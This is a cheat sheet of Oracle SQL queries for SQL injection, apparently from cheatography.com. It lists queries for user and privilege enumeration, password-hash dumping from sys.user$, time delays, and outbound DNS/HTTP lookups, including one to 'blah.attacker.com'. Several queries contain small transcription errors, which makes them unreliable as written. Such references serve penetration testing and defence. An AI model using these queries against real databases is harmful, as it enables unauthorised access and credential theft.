

# Oracle SQL Injection Cheat Sheet

by Dormidera via cheatography.com/117478/cs/21822/

#### Version

SELECT banner FROM v\$version WHERE banner LIKE 'Oracle%';

SELECT banner FROM v\$version WHERE banner LIKE 'TNS%';

SELECT version FROM v\$instance;

#### Comments

SELECT 1 FROM dual — comment

 NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name 'dual' when we're not actually selecting from a table.

#### **Current User**

SELECT user FROM dual

#### **List Users**

SELECT username FROM all users ORDER BY username;

SELECT name FROM sys.user\$; — priv

#### **List Password Hashes**

SELECT name, password, astatus FROM sys.user\$ — priv, <= 10g

SELECT name, spare4 FROM sys.user\$ - priv, 11g

#### **List Privileges**

SELECT \* FROM session\_privs; — current privs

SELECT \* FROM dba\_sys\_privs WHERE grantee = 'DBSNMP'; — priv, list a user's privs

SELECT grantee FROM dba\_sys\_privs WHERE privilege = 'SELECT ANY DICTIONARY'; — priv, find users with a particular priv

SELECT GRANTEE, GRANTED\_ROLE FROM DBA\_ROLE\_PRIVS;

#### Location of DB files

SELECT name FROM V\$DATAFILE;

# **Avoiding Quotes**

SELECT chr(65) || chr(66) FROM dual; — returns AB

### Hostname, IP Address

SELECT UTL\_INADDR.get\_host\_name FROM dual;

SELECT host\_name FROM v\$instance;

SELECT UTL\_INADDR.get\_host\_address FROM dual; — gets IP address

SELECT UTL\_INADDR.get\_host\_name('10.0.0.1') FROM dual; — gets hostnames

#### **Time Delay**

BEGIN DBMS\_LOCK.SLEEP(5); END; — priv, can't seem to embed this in a SELECT

SELECT UTL\_INADDR.get\_host\_name('10.0.0.1') FROM dual; — if reverse looks are slow

SELECT UTL\_INADDR.get\_host\_address('blah.attacker.com') FROM dual; — if forward lookups are slow

SELECT UTL\_HTTP.REQUEST('http://google.com') FROM dual; — if outbound TCP is filtered / slow

#### **Case Statement**

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1

SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2

#### **Make DNS Requests**

SELECT UTL\_INADDR.get\_host\_address('google.com') FROM dual; SELECT UTL\_HTTP.REQUEST('http://google.com') FROM dual;

#### **String Concatenation**

SELECT 'A' || 'B' FROM dual; - returns AB

## **Current Database**

SELECT global\_name FROM global\_name;

SELECT name FROM v\$database;

SELECT instance name FROM v\$instance;

SELECT SYS.DATABASE\_NAME FROM DUAL;

#### **List Databases**

SELECT DISTINCT owner FROM all\_tables; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status).

#### **List Columns**

SELECT column\_name FROM all\_tab\_columns WHERE table\_name = 'blah';

SELECT column\_name FROM all\_tab\_columns WHERE table\_name = 'blah' and owner = 'foo';

#### **Bitwise AND**

SELECT bitand(6,2) FROM dual; — returns 2

SELECT bitand(6,1) FROM dual; — returns0



By **Dormidera** 

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#### If Statement

BEGIN IF 1=1 THEN dbms\_lock.sleep(3); ELSE dbms\_lock.sleep(0); END IF; END; — doesn't play well with SELECT statements

#### **List DBA Accounts**

SELECT DISTINCT grantee FROM dba\_sys\_privs WHERE ADMIN\_-OPTION = 'YES'; — priv, list DBAs, DBA roles

#### **Select Nth Row**

SELECT username FROM (SELECT ROWNUM r, username FROM all\_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)

#### **List Tables**

SELECT table\_name FROM all\_tables;

SELECT owner, table\_name FROM all\_tables;

# **Find Tables From Column Name**

SELECT owner, table\_name FROM all\_tab\_columns WHERE columnname LIKE '%PASS%'; — NB: table names are upper case

#### **Select Nth Char**

SELECT substr('abcd', 3, 1) FROM dual; — gets 3rd character, 'c'

#### ASCII Value -> Char

SELECT chr(65) FROM dual; — returns A

#### Casting

SELECT CAST(1 AS char) FROM dual;

SELECT CAST('1' AS int) FROM dual;

# Char -> ASCII Value

SELECT ascii('A') FROM dual; — returns 65



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